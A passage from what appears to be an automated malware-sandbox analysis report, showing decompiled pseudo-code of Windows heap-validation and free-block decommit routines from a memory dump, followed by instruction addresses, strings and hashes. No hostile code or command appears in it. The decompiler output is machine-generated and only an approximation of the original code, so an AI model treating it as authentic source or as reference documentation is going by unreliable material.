						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E010A174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E0107B150();
										} else {
											E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E0107B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E0107B150();
									} else {
										E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E0107B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E0107B150();
								} else {
									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E0107B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E0107B150();
							} else {
								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01134AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0112FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E011223E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                            0x011344a1
                                                                            0x011344a3
                                                                            0x011344a7
                                                                            0x011344ac
                                                                            0x011344af
                                                                            0x011344b2
                                                                            0x011344b9
                                                                            0x011344bc
                                                                            0x011347f2
                                                                            0x011347f2
                                                                            0x011347f8
                                                                            0x011347fc
                                                                            0x011347fe
                                                                            0x01134804
                                                                            0x01134805
                                                                            0x01134805
                                                                            0x0113480c
                                                                            0x01134810
                                                                            0x01134812
                                                                            0x01134812
                                                                            0x01134812
                                                                            0x01134822
                                                                            0x01134822
                                                                            0x01134827
                                                                            0x01134827
                                                                            0x00000000
                                                                            0x01134827
                                                                            0x011344c4
                                                                            0x011344d3
                                                                            0x011344d9
                                                                            0x011344dc
                                                                            0x011344de
                                                                            0x011344e0
                                                                            0x01134560
                                                                            0x01134520
                                                                            0x01134522
                                                                            0x01134525
                                                                            0x01134528
                                                                            0x0113452b
                                                                            0x0113452e
                                                                            0x01134530
                                                                            0x01134697
                                                                            0x0113469d
                                                                            0x011346a1
                                                                            0x011346c0
                                                                            0x011346c5
                                                                            0x011346a3
                                                                            0x011346b8
                                                                            0x011346bd
                                                                            0x011346cb
                                                                            0x011346d4
                                                                            0x01134677
                                                                            0x01134677
                                                                            0x01134679
                                                                            0x0113467c
                                                                            0x0113468a
                                                                            0x01134690
                                                                            0x01134690
                                                                            0x011347f1
                                                                            0x011347f1
                                                                            0x011347f1
                                                                            0x00000000
                                                                            0x011347f1
                                                                            0x01134536
                                                                            0x01134539
                                                                            0x0113453c
                                                                            0x01134636
                                                                            0x0113463c
                                                                            0x01134640
                                                                            0x0113465f
                                                                            0x01134664
                                                                            0x01134642
                                                                            0x01134657
                                                                            0x0113465c
                                                                            0x01134670
                                                                            0x00000000
                                                                            0x01134542
                                                                            0x01134542
                                                                            0x01134546
                                                                            0x01134548
                                                                            0x0113454b
                                                                            0x01134555
                                                                            0x0113455b
                                                                            0x0113455b
                                                                            0x0113455b
                                                                            0x0113455d
                                                                            0x0113455d
                                                                            0x0113455d
                                                                            0x00000000
                                                                            0x0113455d
                                                                            0x0113453c
                                                                            0x01134579
                                                                            0x0113457c
                                                                            0x01134587
                                                                            0x01134589
                                                                            0x01134591
                                                                            0x01134592
                                                                            0x01134597
                                                                            0x01134598
                                                                            0x011345a1
                                                                            0x011345ab
                                                                            0x011345ab
                                                                            0x011345a1
                                                                            0x011345ae
                                                                            0x011345b4
                                                                            0x011345b9
                                                                            0x011345bd
                                                                            0x01134759
                                                                            0x01134759
                                                                            0x0113475f
                                                                            0x01134761
                                                                            0x01134763
                                                                            0x01134765
                                                                            0x01134768
                                                                            0x0113476b
                                                                            0x0113476d
                                                                            0x0113479c
                                                                            0x0113479c
                                                                            0x0113479f
                                                                            0x011347a2
                                                                            0x011347a4
                                                                            0x01134830
                                                                            0x01134833
                                                                            0x01134879
                                                                            0x0113487d
                                                                            0x011348f1
                                                                            0x011348f3
                                                                            0x011348f3
                                                                            0x00000000
                                                                            0x011348f3
                                                                            0x0113487f
                                                                            0x01134885
                                                                            0x01134887
                                                                            0x011348a8
                                                                            0x011348a8
                                                                            0x011348ae
                                                                            0x011348b0
                                                                            0x011348dc
                                                                            0x011348dc
                                                                            0x011348dc
                                                                            0x011348dc
                                                                            0x011348ec
                                                                            0x00000000
                                                                            0x011348ec
                                                                            0x011348b2
                                                                            0x011348bc
                                                                            0x011348be
                                                                            0x011348c1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x011348c3
                                                                            0x011348c3
                                                                            0x011348c6
                                                                            0x011348c9
                                                                            0x011348cc
                                                                            0x011348d1
                                                                            0x011348d4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x011348d6
                                                                            0x011348d7
                                                                            0x011348da
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x011348da
                                                                            0x0113494f
                                                                            0x01134955
                                                                            0x01134959
                                                                            0x01134978
                                                                            0x0113497d
                                                                            0x0113495b
                                                                            0x01134970
                                                                            0x01134975
                                                                            0x01134986
                                                                            0x01134987
                                                                            0x0113498a
                                                                            0x0113498d
                                                                            0x01134997
                                                                            0x011347ef
                                                                            0x011347ef
                                                                            0x011347ef
                                                                            0x00000000
                                                                            0x011347ef
                                                                            0x01134890
                                                                            0x01134890
                                                                            0x01134891
                                                                            0x01134891
                                                                            0x01134894
                                                                            0x01134897
                                                                            0x0113489d
                                                                            0x011348a0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x011348a2
                                                                            0x011348a3
                                                                            0x011348a6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x011348a6
                                                                            0x011348fb
                                                                            0x01134901
                                                                            0x01134905
                                                                            0x01134924
                                                                            0x01134929
                                                                            0x01134907
                                                                            0x0113491c
                                                                            0x01134921
                                                                            0x0113492f
                                                                            0x01134935
                                                                            0x01134936
                                                                            0x01134939
                                                                            0x01134942
                                                                            0x00000000
                                                                            0x01134947
                                                                            0x01134835
                                                                            0x0113483b
                                                                            0x0113483f
                                                                            0x0113485e
                                                                            0x01134863
                                                                            0x01134841
                                                                            0x01134856
                                                                            0x0113485b
                                                                            0x01134869
                                                                            0x0113486c
                                                                            0x0113486f
                                                                            0x011347e7
                                                                            0x011347e7
                                                                            0x00000000
                                                                            0x011347ec
                                                                            0x011347aa
                                                                            0x011347b0
                                                                            0x011347b4
                                                                            0x011347d3
                                                                            0x011347d8
                                                                            0x011347b6
                                                                            0x011347cb
                                                                            0x011347d0
                                                                            0x011347de
                                                                            0x011347df
                                                                            0x011347e2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0113476f
                                                                            0x0113476f
                                                                            0x01134778
                                                                            0x01134785
                                                                            0x01134787
                                                                            0x0113478c
                                                                            0x0113478e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134790
                                                                            0x01134792
                                                                            0x01134794
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134796
                                                                            0x01134799
                                                                            0x00000000
                                                                            0x01134799
                                                                            0x00000000
                                                                            0x011345c3
                                                                            0x011345c3
                                                                            0x011345c7
                                                                            0x011345c7
                                                                            0x011345ca
                                                                            0x011345cf
                                                                            0x011345d3
                                                                            0x011345df
                                                                            0x011345e4
                                                                            0x011345e6
                                                                            0x011345e8
                                                                            0x011345ed
                                                                            0x011345ed
                                                                            0x011345f2
                                                                            0x011345f2
                                                                            0x011345f7
                                                                            0x011345fc
                                                                            0x01134602
                                                                            0x01134606
                                                                            0x01134609
                                                                            0x0113460f
                                                                            0x011346de
                                                                            0x011346e3
                                                                            0x011346e5
                                                                            0x011346ec
                                                                            0x011346ee
                                                                            0x011346f6
                                                                            0x011346f6
                                                                            0x011346f6
                                                                            0x011346f6
                                                                            0x011346ec
                                                                            0x01134615
                                                                            0x01134615
                                                                            0x0113461d
                                                                            0x0113462e
                                                                            0x0113462e
                                                                            0x0113461d
                                                                            0x0113460f
                                                                            0x01134609
                                                                            0x011346fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134710
                                                                            0x0113471a
                                                                            0x01134720
                                                                            0x01134720
                                                                            0x01134722
                                                                            0x0113472c
                                                                            0x00000000
                                                                            0x0113472e
                                                                            0x0113472e
                                                                            0x00000000
                                                                            0x0113472e
                                                                            0x0113472c
                                                                            0x01134738
                                                                            0x0113473c
                                                                            0x0113474b
                                                                            0x01134751
                                                                            0x01134751
                                                                            0x00000000
                                                                            0x0113473c
                                                                            0x011348f4
                                                                            0x011348f4
                                                                            0x00000000
                                                                            0x011348f4

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                            • API String ID: 0-1357697941
                                                                            • Opcode ID: b3abe936e9d9191cdd2fd71e26c5bf1e431c15eef90700cfdf372056366326c3
                                                                            • Instruction ID: d7471528c507e2e9e2fd898a98e9abb168343af3357c3d44898cbecb3b137df0
                                                                            • Opcode Fuzzy Hash: b3abe936e9d9191cdd2fd71e26c5bf1e431c15eef90700cfdf372056366326c3
                                                                            • Instruction Fuzzy Hash: 33F17531A00646DFDB29CFA9C480BBAFBF5FF89304F448069E5869BA45D730A985CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109A309, Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 72%
                                                                            			E0109A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x1168a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0109A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0109DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E01079373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E0107A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1168748 - 1;
						if( *0x1168748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E0107B150();
								} else {
									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0107B150();
								__eflags =  *0x1167bc8;
								if( *0x1167bc8 == 0) {
									__eflags = 1;
									E01132073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1168748 - 1;
							if( *0x1168748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E010A174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E01097D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E011314FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E01079373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E01079819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1168748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E0107B150();
											} else {
												E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0107B150();
											_pop(_t491);
											__eflags =  *0x1167bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01132073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0113A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0109A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E01097D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E01097D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01131411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E01097D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E01097D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1168748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E0107B150();
							} else {
								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0107B150();
							__eflags =  *0x1167bc8;
							if( *0x1167bc8 == 0) {
								__eflags = 0;
								E01132073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1168748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E0107B150();
												} else {
													E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E0107B150();
												__eflags =  *0x1167bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01132073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0113A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
